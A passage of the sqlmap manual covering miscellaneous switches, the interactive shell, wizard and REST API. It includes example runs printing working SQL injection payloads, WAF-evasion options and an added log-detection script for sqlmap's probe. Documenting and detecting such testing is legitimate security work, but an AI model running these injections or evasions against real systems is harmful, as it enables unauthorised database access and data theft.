[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 i
s out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is
 out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
[...]

Save relevant options to INI configuration file

Options: --save

You can save the options given on the command line to an INI configuration file. The generated file can be edited and loaded later with the -c option described above.

Update sqlmap

Switch: --update

With this switch, the tool is upgraded directly from the Git repository to the latest development version. A network connection is required, of course.

If that fails, you can run git pull directly in the directory where sqlmap is located; the effect is the same as using the --update switch. If you are using sqlmap on Windows, you can use the SmartGit client.

Before reporting any potential bug on the mailing list, it is strongly recommended to try the method described above.

Miscellaneous

Use short mnemonics

Options: -z

Typing out every option and switch you want to use is tedious, especially for the commonly used ones (for example: --batch --random-agent --ignore-proxy --technique=BEU). sqlmap offers a shorter way to deal with this, called mnemonics.

With option -z, each option and switch can be given as a shorter mnemonic, separated by commas (,), where each mnemonic is an arbitrarily chosen prefix of the original option name. Options and switches are not mapped to fixed shortened forms; the only condition is that no other option or switch starts with the same prefix.

For example:

$ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "ww\
w.target.com/vuln.php?id=1"

It can be written in short mnemonic form (one of many methods):

$ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
1"

Another example:

$ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
b -T users -u "www.target.com/vuln.php?id=1"

It can be written in short mnemonic form:

$ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
com/vuln.php?id=1"

Warning successful SQL injection detection

Options: --alert

Set answers to questions

Options: --answers

If you want sqlmap to answer its questions automatically, even while using --batch, you can provide part of each question text followed by an equals sign and the desired answer. Answers to different questions are separated by a delimiter.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --te\
chnique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provide
d level (1) and risk (1)? [Y/n] N
[...]

Beep when SQL injection is found

Switch: --beep

With the --beep switch, sqlmap beeps immediately whenever a SQL injection is found. This is particularly useful when testing a large list of target URLs (option -m).

Clear the specific sqlmap UDF(s) and tables in the DBMS

Switch: --cleanup

After taking over the underlying operating system or file system, it is recommended to clean up sqlmap's temporary tables and user-defined functions in the back-end DBMS. The --cleanup switch cleans up the DBMS and file system as far as possible.

Check dependencies

Switch: --dependencies

In some special cases sqlmap requires additional third-party libraries (for example, for option -d, for the --os-pwn switch with the icmpsh tunnel, for option --auth-type with NTLM HTTP authentication, etc.), and the user is warned only in those cases. To check all of these third-party library dependencies at once, use the --dependencies switch.

$ python sqlmap.py --dependencies
[...]
[xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
 order to directly connect to the DBMS Firebird. Download from http://kinterbasd
b.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
rge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
unt/PyMySQL/
[xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
ceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
sycopg/
[xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
p/ibm-db/
[xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
rty library in order to directly connect to the DBMS HSQLDB. Download from https
://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
googlecode.com/
[xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
mssql.sourceforge.net/
[xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
an to attack a web application behind NTLM authentication. Download from http://
code.google.com/p/python-ntlm/
[xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
ou plan to attack a web application using WebSocket. Download from https://pypi.
python.org/pypi/websocket-client/

Disable console output coloring

Switch: --disable-coloring

By default, sqlmap colors its console output. Use this switch to disable coloring and avoid undesirable effects such as unresolved ANSI escape codes appearing in the console (for example \x01\x1b[0;32m\x02[INFO]).

Google dork results using specific page numbers

Options: --gpage

By default, with option -g, sqlmap uses the first 100 URLs from the Google search results for further SQL injection testing. Combined with that option, --gpage lets you specify a page other than the first one from which the target URLs are taken.

Use HTTP parameter pollution

Switch: --hpp

HTTP parameter pollution (HPP) is a technique for bypassing WAF/IPS/IDS protection (see the linked introduction) that is especially effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect that the target is protected this way, you can try this switch to bypass it.

Test for WAF/IPS/IDS protection

Switch: --identify-waf

sqlmap can try to identify back-end WAF/IPS/IDS protection (if any), so that the user can take appropriate steps (for example, using a tamper script via the --tamper option). At present about 30 different products are supported (such as Airlock, Barracuda WAF, etc.); the corresponding WAF scripts can be found in the waf directory.

Example of MySQL target protected by ModSecurity WAF:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
dentify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (Un
ited Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application 
Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)
'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Ak
amai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application 
Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application S
ecurity (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firew
all (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Appli
cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
-tamper')
[...]

Skip heuristic detection WAF/IPS/IDS protection

Switch: --skip-waf

By default, sqlmap sends a dummy parameter in one of its startup requests whose value is an intentionally "suspicious" SQL injection payload (for example: ...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1). If the target's response differs from the response to the original request, a protection mechanism is likely in place. If this causes problems, the user can disable the mechanism with the --skip-waf switch.
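From the defender's side, the probe just described has a recognisable shape in web server access logs. The following Python script is an added detection example, not code from sqlmap or the original post: it parses combined-format log lines, URL-decodes each query parameter and reports those carrying the probe payload. The log lines, addresses, paths and the parameter name foobar are constructed sample data.

```python
"""Flagging sqlmap's WAF/IPS/IDS heuristic probe in web server access logs.

Added detection example, not code from sqlmap or the original post. The probe
described above is a dummy parameter whose value is a deliberately suspicious
SQL payload; this script parses combined-format access log lines, URL-decodes
every query parameter and reports the ones carrying that payload shape.
All log lines, addresses and paths below are constructed sample data.
"""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Apache/Nginx "combined" format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Shape of the probe quoted in the text: a tautology followed by a UNION ALL
# SELECT that reads information_schema.tables. Matched on the decoded value,
# not on the parameter name, since the dummy name is not fixed.
PROBE_RE = re.compile(
    r"\bAND\s+1\s*=\s*1\s+UNION\s+ALL\s+SELECT\b.*\binformation_schema\.tables\b",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample log: a normal request, the probe, and a benign request
# that merely contains the word "union".
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2022:21:15:20 +0100] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Jan/2022:21:15:21 +0100] "GET /vuln.php?id=1&foobar=AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [28/Jan/2022:21:16:02 +0100] "GET /search.php?q=union+station HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def is_probe(value: str) -> bool:
    """True when a decoded parameter value has the heuristic probe's shape."""
    return PROBE_RE.search(value) is not None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_probes(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per query parameter that carries the probe payload."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        parts = urlsplit(fields["target"])
        # parse_qsl percent-decodes values and turns '+' into spaces, so the
        # signature is checked against what the application actually received.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if is_probe(value):
                hits.append({
                    "ip": fields["ip"],
                    "ts": fields["ts"],
                    "path": parts.path,
                    "param": name,
                    "value": value,
                })
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} param={hit['param']!r}")
        print("    ", hit["value"])
```

A single hit of this shape is a strong hint that sqlmap's startup check ran against the path, which is worth correlating with the other requests from the same client in the same minute.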

Imitate a smartphone

Switch: --mobile

Some web servers serve a different interface to mobile phones than to desktop computers. In such cases you can force a predefined smartphone HTTP User-Agent header value. With this switch, sqlmap asks you to choose one of several popular smartphones, which it then imitates for the current run.

Running example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Offline working mode (using session data only)

Switch: --offline

With the --offline switch, sqlmap uses only the data from previous sessions during enumeration. This essentially means that no connection attempts are made during such a run.

Safely delete everything in the output directory

Switch: --purge-output

If the user wants to safely remove all content of the output directory, including all details of targets sqlmap has run against before, the --purge-output switch can be used. During purging, all files in the output directory (and its subdirectories) are overwritten with random data, truncated and renamed to random names; the subdirectories are renamed to random names as well; finally the whole directory tree is deleted.

Running example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]

Conduct thorough tests only when heuristics are positive

Switch: --smart

Sometimes the user has a large list of potential target URLs (for example, with option -m) and wants to find vulnerable targets as quickly as possible. With the --smart switch, only parameters that provoke DBMS errors are tested further; all others are skipped.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
r=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might 
not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
t not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you 
want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
 HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in
jectable 
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the 
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
[...]

Select (or skip) tests based on payloads and / or titles

Options: --test-filter

Use this option to filter tests by their payloads and/or titles. For example, to run only the tests whose payloads contain the keyword ROW, use --test-filter=ROW.

Example for MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
atch --test-filter=ROW
[...]
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be 
injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
 HAVING clause' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
T (C
    ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
M (S
    ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY 
x)
---
[...]

Options: --test-skip

Use this option to skip tests by their payloads and/or titles. For example, to skip the tests whose payloads contain the keyword BENCHMARK, use --test-skip=BENCHMARK.

Interactive sqlmap shell

Switch: --sqlmap-shell

With the --sqlmap-shell switch, the user gets an interactive sqlmap shell that keeps the history of all previous runs, including the options and/or switches used:

$ python sqlmap.py --sqlmap-shell
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
BEU --batch
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:11

[xx:xx:11] [INFO] testing connection to the target URL
[xx:xx:12] [INFO] testing if the target URL is stable
[xx:xx:13] [INFO] target URL is stable
[xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] GET parameter 'artist' is dynamic
[xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
 be injectable (possible DBMS: 'MySQL')
[xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[xx:xx:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:15] [INFO] target URL appears to have 3 columns in query
[xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
---
[xx:xx:16] [INFO] testing MySQL
[xx:xx:16] [INFO] confirming MySQL
[xx:xx:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at xx:xx:25

[xx:xx:26] [INFO] resuming back-end DBMS 'mysql' 
[xx:xx:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
---
[xx:xx:26] [INFO] the back-end DBMS is MySQL
[xx:xx:26] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.1.73-0ubuntu0.10.04.1'
[xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
sqlmap-shell> exit

Wizard interface suitable for beginners

Switch: --wizard

sqlmap provides a wizard interface for beginners, which uses a simple workflow with as few questions as possible. If the user just enters the target URL and accepts the default choices (for example, by pressing Enter), a properly configured sqlmap run should result by the end of the workflow.

Example for Microsoft SQL Server target:

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at xx:xx:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
    Oct 14 2005 00:33:37 
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at xx:xx:52

API(REST-JSON)

sqlmap can be run through its REST-JSON API, that is, an API in REST (REpresentational State Transfer) style that exchanges JSON messages between a server and client instances. Put simply, the server runs the sqlmap scans, while the client sets the sqlmap options/switches and pulls the results back. The main program file for the API is sqlmapapi.py, and a client can be implemented in any user program.

$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")

Run sqlmapapi.py with the switch -s to start the server and with the switch -c to start the client. In both cases the user can (optionally) set the IP address and port to listen on with the option -H (default "127.0.0.1") and the option -p (default 8775). Each client "session" can have multiple "tasks" (for example, running sqlmap scans), and the user can choose any of them to be the currently active task.

The commands available in the client command line interface are:

  • help -- display a list of available commands and basic help information
  • new ARGS -- start a new scan task with the provided arguments (for example: new -u "http://testphp.vulnweb.com/artists.php?artist=1")
  • use TASKID -- switch the current context to a different task (for example: use c04d8c5c7582efb4)
  • data -- retrieve and display the data of the current task
  • log -- retrieve and display the log of the current task
  • status -- retrieve and display the status of the current task
  • stop -- stop the current task
